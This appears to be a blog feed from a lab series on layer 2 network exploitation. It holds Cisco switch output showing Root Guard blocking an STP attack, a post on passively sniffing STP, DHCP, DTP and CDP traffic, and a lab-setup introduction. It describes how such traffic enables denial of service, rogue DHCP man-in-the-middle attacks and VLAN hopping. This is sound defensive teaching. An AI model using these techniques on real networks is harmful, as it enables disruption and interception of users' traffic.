<span class="gt">*Oct 16 11:26:22.216: %SPANTREE-2-ROOTGUARD_CONFIG_CHANGE: Root guard enabled on port Ethernet1/2.</span>
<span class="gt">*Oct 16 11:26:22.216: %SPANTREE-2-ROOTGUARD_CONFIG_CHANGE: Root guard enabled on port Ethernet1/3.</span>
<span class="gp">IOU1(config-if-range)#</span><span class="nb">end</span>
<span class="gp">IOU1#</span>
<span class="gt">*Oct 16 11:26:40.887: %SYS-5-CONFIG_I: Configured from console by console</span>
<span class="gp">IOU1#</span><span class="k">copy</span> running-config startup-config
<span class="go">Destination filename [startup-config]?</span>
<span class="go">Building configuration...</span>
<span class="go">Compressed configuration from 2110 bytes to 1160 bytes[OK]</span>
<span class="gp">IOU1#</span>
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>To disable Root Guard, use the command <code>spanning-tree guard none</code>.</p>
</div>
<p>Reproducing the attack now turns the affected port in root-inconsistent state
and has no effect anymore on <em>User_1</em> connectivity while isolating the
offender’s network until the end of the attack (for the sake of the exercise
ensure that you have <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard disabled when you try this!):</p>
<div class="codehilite"><pre><span class="gp">IOU1#</span>
<span class="gt">*Oct 16 11:30:45.588: %SPANTREE-2-ROOTGUARD_BLOCK: Root guard blocking port Ethernet1/1 on VLAN0001.</span>
<span class="gp">IOU1#</span>
<span class="gp">IOU1#</span><span class="k">show</span> spanning-tree vlan <span class="s">1</span>
<span class="go">VLAN0001</span>
<span class="go">Spanning tree enabled protocol ieee</span>
<span class="go">Root ID Priority 24577</span>
<span class="go"> Address aabb.cc00.0400</span>
<span class="go"> This bridge is the root</span>
<span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go">Bridge ID Priority 24577 (priority 24576 sys-id-ext 1)</span>
<span class="go"> Address aabb.cc00.0400</span>
<span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go"> Aging Time 300 sec</span>
<span class="go">Interface Role Sts Cost Prio.Nbr Type</span>
<span class="go">------------------- ---- --- --------- -------- --------------------------------</span>
<span class="go">Et0/0 Desg FWD 100 128.1 Shr</span>
<span class="go">Et0/1 Desg FWD 100 128.2 Shr</span>
<span class="go">Et0/2 Desg FWD 100 128.3 Shr</span>
<span class="go">Et0/3 Desg FWD 100 128.4 Shr</span>
<span class="go">Et1/0 Desg FWD 100 128.5 Shr</span>
<span class="hll"><span class="go">Et1/1 Desg BKN*100 128.6 Shr *ROOT_Inc</span>
</span><span class="go">Et1/2 Desg FWD 100 128.7 Shr</span>
<span class="go">Et1/3 Desg FWD 100 128.8 Shr</span>
<span class="gp">IOU1#</span>
</pre></div>
<p>Unlike with <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard, simply stopping the attack automatically restores the connectivity:</p>
<div class="codehilite"><pre><span class="gp">IOU1#</span>
<span class="gt">*Oct 16 11:40:40.657: %SPANTREE-2-ROOTGUARD_UNBLOCK: Root guard unblocking port Ethernet1/1 on VLAN0001.</span>
<span class="gp">IOU1#</span>
</pre></div>Practical network layer 2 exploitation: passive reconnaissance2017-10-12T00:00:00+02:002017-10-12T00:00:00+02:00WhiteWinterWolftag:www.whitewinterwolf.com,2017-10-12:/posts/2017/10/12/practical-network-layer-2-exploitation-passive-reconnaissance/<p>This post is part of a series about <a href="/tags/lab/#practical-network-layer-2-exploitation" title="Lab: Practical network layer 2 exploitation">practical network layer 2 exploitation</a>.</p>
<p>Now is the time to change your network administrator hat for the attacker one.
Your own, known network now becomes an unfamiliar target.</p>
<p>Before rushing and banging against the nearest devices, it may wiser to just
stand back and listen.</p>
<p>On switched networks, users are somewhat isolated from each other thanks to the
separation of collision domains.
All that remain is some kind white noise… but this white noise in itself can
bring invaluable information to an attacker!</p>
<p>In particular we will see how, simply by passively listening to this white
noise, an attacker will be able to detect several weaknesses affecting the
network and plan his next steps.</p>
<p>In this lab no interaction will occur with either the <em>Admins</em> or the <em>Servers</em>
<abbr title="Virtual Local Area Networks">VLANs</abbr>, the <em>User_1</em> workstation will be required only for the
<a href="#dhcp-discover-messages"><abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> Discover messages</a> part …</p><p>This post is part of a series about <a href="/tags/lab/#practical-network-layer-2-exploitation" title="Lab: Practical network layer 2 exploitation">practical network layer 2 exploitation</a>.</p>
<p>Now is the time to change your network administrator hat for the attacker one.
Your own, known network now becomes an unfamiliar target.</p>
<p>Before rushing and banging against the nearest devices, it may wiser to just
stand back and listen.</p>
<p>On switched networks, users are somewhat isolated from each other thanks to the
separation of collision domains.
All that remain is some kind white noise… but this white noise in itself can
bring invaluable information to an attacker!</p>
<p>In particular we will see how, simply by passively listening to this white
noise, an attacker will be able to detect several weaknesses affecting the
network and plan his next steps.</p>
<p>In this lab no interaction will occur with either the <em>Admins</em> or the <em>Servers</em>
<abbr title="Virtual Local Area Networks">VLANs</abbr>, the <em>User_1</em> workstation will be required only for the
<a href="#dhcp-discover-messages"><abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> Discover messages</a> part:</p>
<p><span class="lb-small"><a href="#topology.png" id="topology.png-thumb" title="Click to enlarge"><img alt="passive reconnaissance lab topology" src="https://www.whitewinterwolf.com/posts/2017/10/12/practical-network-layer-2-exploitation-passive-reconnaissance/topology.png"/></a></span></p>
<h3 id="stp-messages"><a class="toclink" href="#stp-messages"><abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> messages</a></h3>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>Now is the time to open a session on the <em>Attacker</em> host and fire-up
<a href="https://www.wireshark.org/" rel="external" title="Wireshark project homepage">Wireshark</a>.
As with most tool we will use in this post series, it requires a raw access to
the network devices and must therefore be run as root: this is not a problem
on some distributions like Kali where the whole desktop session is running as
root, on other you may need to start Wireshark through <code>sudo wireshark</code>.</p>
<p>Once Wireshark is up and listening on your main network interface in
promiscuous mode, you should already start to see mostly light-grey packets
regularly accumulating as the “white noise” mentioned earlier.</p>
<p>Most of these messages are <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> messages, sent every few seconds by the
nearby switch:</p>
<p><span class="lb-small"><a href="#stp.png" id="stp.png-thumb" title="Click to enlarge"><img alt="STP messages" src="https://www.whitewinterwolf.com/posts/2017/10/12/practical-network-layer-2-exploitation-passive-reconnaissance/stp.png"/></a></span></p>
<p>These messages are sent in case we add another switch on our end
(in sane networks they should not be sent on access ports).
They are used to detect topology loops and build the most efficient forwarding
path between connected switches.</p>
<p>The presence of these messages means that we can start discussing with the
switch using the <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> protocol, potentially inducing changes to the whole
spanning tree.</p>
<p>By themselves, this ability won’t allow us to do any really profitable attack
against the network.
However, in some cases it can provide us a valuable support to make other
attacks more effective:</p>
<ul>
<li>
<p>The attacker can become root of the <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> tree, making the propagation of
malicious packets throughout the switched network more efficient.</p>
</li>
<li>
<p>The attacker can cause a temporary but renewable <abbr title="Denial of Service">DoS</abbr> disrupting
communication over the whole switched network or a <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> depending on the
network communication.
This can be used as:</p>
<ul>
<li>
<p>A part of a social engineering attack.
For instance a fake <span class="caps">IT</span> support guy calling an employee, notifying about
current network outages <em>“which have been detected”</em> and collecting
sensitive information <em>“for troubleshooting purposes”</em>.</p>
</li>
<li>
<p>A brutal way to paralyze a <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> or a network, for instance to
disrupts network and system management services while the actual attack
is going on.</p>
</li>
</ul>
</li>
</ul>
<h3 id="dhcp-discover-messages"><a class="toclink" href="#dhcp-discover-messages"><abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> Discover messages</a></h3>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>Start or restart the <em>User_1</em> host.
You should eventually see, among other things, a <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> Discover message popping
up in your Wireshark:</p>
<p><span class="lb-small"><a href="#dhcp-discover.png" id="dhcp-discover.png-thumb" title="Click to enlarge"><img alt="DHCP Discover" src="https://www.whitewinterwolf.com/posts/2017/10/12/practical-network-layer-2-exploitation-passive-reconnaissance/dhcp-discover.png"/></a></span></p>
<p>This is a good thing (from an attacker perspective) as this means that <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr>
snooping has not been enabled in the switches you are facing.
This give the attacker the ability to build a rogue <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server, distributing
malicious <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> replies and opening the way to various <abbr title="Man-In-The-Middle"><span class="caps">MITM</span></abbr> attacks.</p>
<p>You can also take this occasion to note-down the <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address of the <em>User_1</em>
machine which appears as the message’s source (<em>Ethernet <span class="caps">II</span>, Src</em> field) address.</p>
<h3 id="dtp-messages"><a class="toclink" href="#dtp-messages"><abbr title="Dynamic Trunking Protocol"><span class="caps">DTP</span></abbr> messages</a></h3>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="no" title="No"><span class="sr-only">No</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>About every minute, you may encounter a <abbr title="Dynamic Trunking Protocol"><span class="caps">DTP</span></abbr> message:</p>
<p><span class="lb-small"><a href="#dtp.png" id="dtp.png-thumb" title="Click to enlarge"><img alt="DTP messages" src="https://www.whitewinterwolf.com/posts/2017/10/12/practical-network-layer-2-exploitation-passive-reconnaissance/dtp.png"/></a></span></p>
<p>This is your lucky day.</p>
<p>This protocol allows plug-and-play auto-configuration of Cisco switches.</p>
<p>At the low-end, from a purely passive perspective we can see that <abbr title="Dynamic Trunking Protocol"><span class="caps">DTP</span></abbr> packets
disclose a lot of information regarding the switch configuration, including the
<abbr title="VLAN Trunk Protocol"><span class="caps">VTP</span></abbr> domain name, the native <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> number and the switch port status.</p>
<p>But above all, this opens the most devastating attack we will see in this
series as actively engaging in the <abbr title="Dynamic Trunking Protocol"><span class="caps">DTP</span></abbr> communication opens the way to <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> hopping.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>The <abbr title="Dynamic Trunking Protocol"><span class="caps">DTP</span></abbr> packets, as the <abbr title="Cisco Discovery Protocol"><span class="caps">CDP</span></abbr> ones we will see <a href="#cdp-messages">below</a>, leak
the native <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> information which happens to be the same as the <em>Users</em>
<abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> in our lab where the attacker is located.</p>
<p>This is usually documented as a security weakness also allowing <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr>
hopping through <a href="https://en.wikipedia.org/wiki/VLAN_hopping#Double_tagging" rel="external" title="VLAN hopping: double-tagging (Wikipedia)">double-tagging</a>, however Cisco switches do not seem
vulnerable to this attack as they correctly drop 802.1Q packets coming on
non-trunk ports.</p>
<p>Moreover, even on vulnerable devices the range of this paticualr attack is
somewhat limited as it allows only one-way communication (still useful for
things like malicious <span class="caps">UDP</span> notifications though).
As we will see, <abbr title="Dynamic Trunking Protocol"><span class="caps">DTP</span></abbr>-based <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> hopping doesn’t have this limitation.</p>
</div>
<h3 id="cdp-messages"><a class="toclink" href="#cdp-messages"><abbr title="Cisco Discovery Protocol"><span class="caps">CDP</span></abbr> messages</a></h3>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>At last, about every minute you may also encounter a <abbr title="Cisco Discovery Protocol"><span class="caps">CDP</span></abbr> message:</p>
<p><span class="lb-small"><a href="#cdp.png" id="cdp.png-thumb" title="Click to enlarge"><img alt="CDP messages" src="https://www.whitewinterwolf.com/posts/2017/10/12/practical-network-layer-2-exploitation-passive-reconnaissance/cdp.png"/></a></span></p>
<p>These messages allow a Cisco device to share some technical details with other
directly connected devices.
This protocol is used by several Cisco proprietary features, such as:</p>
<ul>
<li>
<p>Cisco Neighbor Discovery: each device stores a table fetchable through <span class="caps">SNMP</span>
containing their neighbors information.</p>
</li>
<li>
<p>Lowering power delivered through <abbr title="Power-over-Ethernet">PoE</abbr> ports: a Cisco device
(like an <span class="caps">IP</span> phone) can use this to inform the <abbr title="Power-over-Ethernet">PoE</abbr> switch it is connected to
that it requires only 9 W instead of the default 15.4 W, thus lowering the
switch’s global energy consumption.
<a href="https://www.cisco.com/c/en/us/td/docs/switches/lan/catalyst3750/software/troubleshooting/g_power_over_ethernet.html?mdfid=281204560#wp1017625" rel="external" title="Cisco Discovery Protocol and PoE (Cisco)">More information</a>.</p>
</li>
<li>
<p>On-Demand routing (<abbr title="On-Demand Routing"><span class="caps">ODR</span></abbr>): this is a Cisco proprietary intermediary solution
between static and dynamic routing.
It can be used in hub and spoke topologies, the spoke routers using <abbr title="Cisco Discovery Protocol"><span class="caps">CDP</span></abbr> to
notify the hub router of their ports <span class="caps">IP</span> address prefixes, thus allowing a
hub router with <abbr title="On-Demand Routing"><span class="caps">ODR</span></abbr> enabled to update its routing table accordingly.
<a href="https://www.youtube.com/watch?v=zgRjN7nfyXU" rel="external" title="On-Demand routing aka ODR - Cisco Router Configuration - CCNP Route (youTube)">More information</a>.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>In <abbr title="On-Demand Routing"><span class="caps">ODR</span></abbr>, the “routing” communication occurs only between the spoke and
hub routers.
Unless you do lousy things such as connecting end-users directly to the
infrastructure switches, it is out of attackers direct reach.</p>
</div>
</li>
</ul>
<p><abbr title="Cisco Discovery Protocol"><span class="caps">CDP</span></abbr> packets are usually not directly exploitable with a notable exception.</p>
<p>Unlike normal network traffic which is not parsed but immediately forwarded
through <abbr title="Application-Specific Integrated Circuits">ASICs</abbr> (see <a href="/posts/2017/08/19/how-to-add-cisco-ios-based-devices-in-gns3/#how-real-gear-works" title="IOS based devices: How real gear works">here</a> for more information), <abbr title="Cisco Discovery Protocol"><span class="caps">CDP</span></abbr> messages content
needs to be parsed by the device’s general purpose <span class="caps">CPU</span>.
Would a <a href="https://tools.cisco.com/security/center/viewAlert.x?alertId=29021" rel="external" title="Multiple Cisco Discovery Protocol Vulnerabilities in Cisco NX-OS-Based Products (Cisco)">a bug</a> be present in the parsing software an attacker may be
able to send specially crafted packets and execute arbitrary code on a
near-by device.</p>
<p>This particular attack is out-of-scope of this series.
We will just notice that <abbr title="Cisco Discovery Protocol"><span class="caps">CDP</span></abbr> messages are extremely verbose when it comes to
devices details, providing:</p>
<ul>
<li>
<p>Detailed information on the platform and firmware version being run (here
a Cisco 3725 box running the C3725-<span class="caps">ADVENTERPRISEK9</span>-M firmware, version
12.4(15)T10, compiled Mon 14-Sep-09 15:33 by prod-rel_team).
Such information can be matched against vulnerability databases to reveal
exploitable software bugs such as the example mentioned above.</p>
</li>
<li>
<p>Details regarding the device configuration, including interface addresses,
<abbr title="VLAN Trunk Protocol"><span class="caps">VTP</span></abbr> domain name, the native <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> number and the device name.
Such information may potentially be reused in other attacks or aggregated
in order to gain knowledge on the network general design and implementation.</p>
</li>
</ul>Practical network layer 2 exploitation: introduction2017-10-10T00:00:00+02:002017-10-10T00:00:00+02:00WhiteWinterWolftag:www.whitewinterwolf.com,2017-10-10:/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/<p>This post initiates a series demonstrating network layer 2 exploitation
and protection techniques from practical point-of-view.</p>
<p>This series will rely on the following topology (click to enlarge):</p>
<p><span class="lb-small"><img alt="Layer 2 exploitation lab topology" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/topology.png"/></span></p>
<p>This topology is composed of three VLANs:</p>
<ul>
<li><em>Users</em> (<abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> 1) and <em>Admins</em> (<abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> 2) both contain end-user workstations,
they are isolated from each other.</li>
<li>Both can access machines located in <em>Servers</em> (<abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> 3).</li>
</ul>
<p>The attacker is connected to the <em>Users</em> <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr>.</p>
<p>In this series we will see how the attacker can leverage various layer 2
configuration weaknesses to disrupt the network, hop from one <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> to another,
and intercept users communication, independently of their location in the topology.</p>
<p>We will limit ourselves to basic techniques as an attempt to
demonstrate that pwning a insufficiently secured network doesn’t involve any
high technology or knowledge.
When appropriate we will also see how the attacks can be generalized to other
real-life scenarios.</p>
<h3>Creating the topology …</h3><p>This post initiates a series demonstrating network layer 2 exploitation
and protection techniques from practical point-of-view.</p>
<p>This series will rely on the following topology (click to enlarge):</p>
<p><span class="lb-small"><a href="#topology.png" id="topology.png-thumb" title="Click to enlarge"><img alt="Layer 2 exploitation lab topology" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/topology.png"/></a></span></p>
<p>This topology is composed of three VLANs:</p>
<ul>
<li><em>Users</em> (<abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> 1) and <em>Admins</em> (<abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> 2) both contain end-user workstations,
they are isolated from each other.</li>
<li>Both can access machines located in <em>Servers</em> (<abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> 3).</li>
</ul>
<p>The attacker is connected to the <em>Users</em> <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr>.</p>
<p>In this series we will see how the attacker can leverage various layer 2
configuration weaknesses to disrupt the network, hop from one <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> to another,
and intercept users communication, independently of their location in the topology.</p>
<p>We will limit ourselves to basic techniques as an attempt to
demonstrate that pwning a insufficiently secured network doesn’t involve any
high technology or knowledge.
When appropriate we will also see how the attacks can be generalized to other
real-life scenarios.</p>
<h3 id="creating-the-topology"><a class="toclink" href="#creating-the-topology">Creating the topology</a></h3>
<p>This topology can be implemented using virtual machines and/or real gears.</p>
<h4 id="virtual-lab"><a class="toclink" href="#virtual-lab">Virtual lab</a></h4>
<p>On my side I use <span class="caps">GNS3</span> to easily build such infrastructure without having to
worry about the multiple issues which come with real gear (availability,
space, etc.).</p>
<p>For more information on how to setup the devices in a virtual lab, you
may want to check the various tutorials available in <a href="https://www.whitewinterwolf.com/tags/lab/" rel="tag" title="View articles tagged 'lab'">lab</a> section.</p>
<p>I recommend to build two versions of the same topology:</p>
<ul>
<li>
<p>One using Dynamips virtualized routers to act as the switches.</p>
</li>
<li>
<p>The other one using <span class="caps">IOU</span> emulated switches.</p>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>As <span class="caps">IOU</span> (sadly!) doesn’t tolerate loops in the topology, you will have to
remove the link between <span class="caps">ESW2</span> and <span class="caps">ESW3</span> in your <span class="caps">IOU</span>-based topology:</p>
<p><span class="lb-small"><a href="#esw2-esw3_remove.png" id="esw2-esw3_remove.png-thumb" title="Click to enlarge"><img alt="Remove the link between ESW2 and ESW3" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/esw2-esw3_remove.png"/></a></span></p>
<p>If you don’t do this, as soon as one of the end-device sends an <span class="caps">ARP</span>
broadcast the <span class="caps">IOU</span> devices will enter in a broadcast storm and consume
100% of your <span class="caps">CPU</span>.</p>
</div>
</li>
</ul>
<p>The other component will remain the same in both topology versions.</p>
<p>Due to the limitation of each solution, some attacks or mitigation techniques
will be possible only in one version of the lab.
I will mention the compatible version throughout the posts series.</p>
<h4 id="real-gears"><a class="toclink" href="#real-gears">Real gears</a></h4>
<p>Using real gears is the most perfect solution to reproduce real-world
environments.
You can rely on the <span class="caps">IOU</span> switches configuration commands taking advantage of <span class="caps">DTP</span>
and adapt them to your hardware.</p>
<p>If you are short of devices, you won’t need the complete topology to be
available at any given time.
I will indicate the required devices at the beginning of each post so you can
focus on the devices required for each part.</p>
<p>Moreover, <em><span class="caps">ESW2</span></em> and <em><span class="caps">ESW3</span></em> switches can be merged into a single switch without
any major impact.
If possible however, I recommend to keep them both with the redundant link
between them to get the most value out these labs.</p>
<h3 id="setting-up-devices"><a class="toclink" href="#setting-up-devices">Setting up devices</a></h3>
<h4 id="iou-based-ethernet-switches"><a class="toclink" href="#iou-based-ethernet-switches"><span class="caps">IOU</span>-based ethernet switches</a></h4>
<p>The following commands apply to switches emulated using <span class="caps">IOU</span>.
They can also be used with real gear.</p>
<p><span class="caps">ESW1</span> is the core switch:</p>
<ul>
<li>All its interfaces are in trunk mode.</li>
<li>It is explicitly set as the <span class="caps">STP</span> primary root on all VLANs.</li>
</ul>
<p><span class="lb-small floatright"><a href="#esw1_iou.png" id="esw1_iou.png-thumb" title="Click to enlarge"><img alt="ESW1 ethernet switch" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/esw1_iou.png"/></a></span>
<span class="caps">ESW1</span> configuration (<span class="caps">IOU</span> version):</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15</pre></div></td><td class="code"><div class="codehilite"><pre><span class="k">conf</span> t
<span class="k">interface</span> range<span class="s"> ethernet 0/0, ethernet 1/0 - 3</span>
<span class="k">switchport</span> trunk encapsulation dot1q
<span class="k">switchport</span> mode trunk
<span class="nb">exit</span>
<span class="k">vtp </span>domain <span class="nv">WWWOLF</span>
<span class="k">vlan</span> <span class="s">2</span>
<span class="k">name </span><span class="nv">admins</span>
<span class="nb">exit</span>
<span class="k">vlan</span> <span class="s">3</span>
<span class="k">name </span><span class="nv">servers</span>
<span class="nb">exit</span>
<span class="k">spanning-tree</span> vlan <span class="s">1-3</span> root primary
<span class="nb">end</span>
<span class="k">copy</span> running-config startup-config
</pre></div>
</td></tr></table></div>
<p><span class="lb-small floatright"><a href="#esw2_esw3_iou.png" id="esw2_esw3_iou.png-thumb" title="Click to enlarge"><img alt="ESW2 and ESW3 ethernet switches (IOU version)" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/esw2_esw3_iou.png"/></a></span>
<span class="caps">ESW2</span> and <span class="caps">ESW3</span> configure themselves automatically thanks to the <span class="caps">DTP</span> protocol (plug-and-play).</p>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>When using <span class="caps">IOU</span>, don’t forget to remove the direct link between <span class="caps">ESW2</span> and
<span class="caps">ESW3</span>.</p>
<p>This warning does not apply for real gear.</p>
</div>
<p><span class="caps">SW4</span> and <span class="caps">SW5</span> provide access to their own <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr>:</p>
<ul>
<li>
<p><span class="lb-small floatright"><a href="#esw4_iou.png" id="esw4_iou.png-thumb" title="Click to enlarge"><img alt="ESW4 ethernet swtich" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/esw4_iou.png"/></a></span>
<span class="caps">SW4</span> configuration (<span class="caps">IOU</span> version):</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre>1
2
3
4
5</pre></div></td><td class="code"><div class="codehilite"><pre><span class="k">conf</span> t
<span class="k">interface</span> range<span class="s"> ethernet 1/0 - 3</span>
<span class="k">switchport</span> access vlan <span class="s">2</span>
<span class="nb">end</span>
<span class="k">copy</span> running-config startup-config
</pre></div>
</td></tr></table></div>
</li>
<li>
<p><span class="lb-small floatright"><a href="#esw5_iou.png" id="esw5_iou.png-thumb" title="Click to enlarge"><img alt="ESW5 ethernet swtich" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/esw5_iou.png"/></a></span>
<span class="caps">SW5</span> configuration (<span class="caps">IOU</span> version):</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre>1
2
3
4
5</pre></div></td><td class="code"><div class="codehilite"><pre><span class="k">conf</span> t
<span class="k">interface</span> range<span class="s"> ethernet 1/0 - 3</span>
<span class="k">switchport</span> access vlan <span class="s">3</span>
<span class="nb">end</span>
<span class="k">copy</span> running-config startup-config
</pre></div>
</td></tr></table></div>
</li>
</ul>
<h4 id="router-based-ethernet-switches"><a class="toclink" href="#router-based-ethernet-switches">Router-based ethernet switches</a></h4>
<p>The following commands apply to c3725/c3745 routers equipped with an
EtherSwitch module to emulate switch devices.</p>
<p><span class="caps">ESW1</span> is the core switch:</p>
<ul>
<li>All its interfaces are in trunk mode.</li>
<li>It is explicitly set as the <span class="caps">STP</span> primary root on all VLANs.</li>
</ul>
<p><span class="lb-small floatright"><a href="#esw1.png" id="esw1.png-thumb" title="Click to enlarge"><img alt="ESW1 ethernet swtich" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/esw1.png"/></a></span>
<span class="caps">SW1</span> configuration (router-based version):</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17</pre></div></td><td class="code"><div class="codehilite"><pre><span class="k">conf</span> t
<span class="k">interface</span> range<span class="s"> fastEthernet 1/0 - 4</span>
<span class="k">switchport</span> trunk encapsulation dot1q
<span class="k">switchport</span> mode trunk
<span class="nb">exit</span>
<span class="k">vtp </span>domain <span class="nv">WWWOLF</span>
<span class="k">vlan</span> <span class="s">2</span>
<span class="k">name </span><span class="nv">admins</span>
<span class="nb">exit</span>
<span class="k">vlan</span> <span class="s">3</span>
<span class="k">name </span><span class="nv">servers</span>
<span class="nb">exit</span>
<span class="k">spanning-tree</span> vlan <span class="s">1</span> root primary
<span class="k">spanning-tree</span> vlan <span class="s">2</span> root primary
<span class="k">spanning-tree</span> vlan <span class="s">3</span> root primary
<span class="nb">end</span>
<span class="k">copy</span> running-config startup-config
</pre></div>
</td></tr></table></div>
<p>With real Catalyst switches and <span class="caps">IOU</span>-based ones, <span class="caps">ESW2</span> and <span class="caps">ESW3</span> work by default
thanks to the <span class="caps">DTP</span> protocol.
Router-based ethernet switches however do not support <span class="caps">DTP</span> (security-wise it is
better that way…), so we need to configure them manually:</p>
<p><span class="lb-small floatright"><a href="#esw2_esw3.png" id="esw2_esw3.png-thumb" title="Click to enlarge"><img alt="ESW2 and ESW3 ethernet switches" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/esw2_esw3.png"/></a></span>
<span class="caps">ESW2</span> and <span class="caps">ESW3</span> configuration (router-based version):</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre>1
2
3
4
5
6
7</pre></div></td><td class="code"><div class="codehilite"><pre><span class="k">conf</span> t
<span class="k">vtp</span> mode client
<span class="k">interface</span> range<span class="s"> fastEthernet 1/0 - 1</span>
<span class="k">switchport</span> trunk encapsulation dot1q
<span class="k">switchport</span> mode trunk
<span class="nb">end</span>
<span class="k">copy</span> running-config startup-config
</pre></div>
</td></tr></table></div>
<p><span class="caps">ESW4</span> and <span class="caps">ESW5</span> provide access to their own <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> (and the trunk port needs to be
manually configured still due to the lack of <span class="caps">DTP</span>):</p>
<ul>
<li>
<p><span class="lb-small floatright"><a href="#esw4.png" id="esw4.png-thumb" title="Click to enlarge"><img alt="ESW4 ethernet swtich" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/esw4.png"/></a></span>
<span class="caps">ESW4</span> configuration (router-based version):</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre> 1
2
3
4
5
6
7
8
9
10</pre></div></td><td class="code"><div class="codehilite"><pre><span class="k">conf</span> t
<span class="k">vtp</span> mode client
<span class="k">interface</span> range<span class="s"> fastEthernet 1/1 - 15</span>
<span class="k">switchport</span> access vlan <span class="s">2</span>
<span class="nb">exit</span>
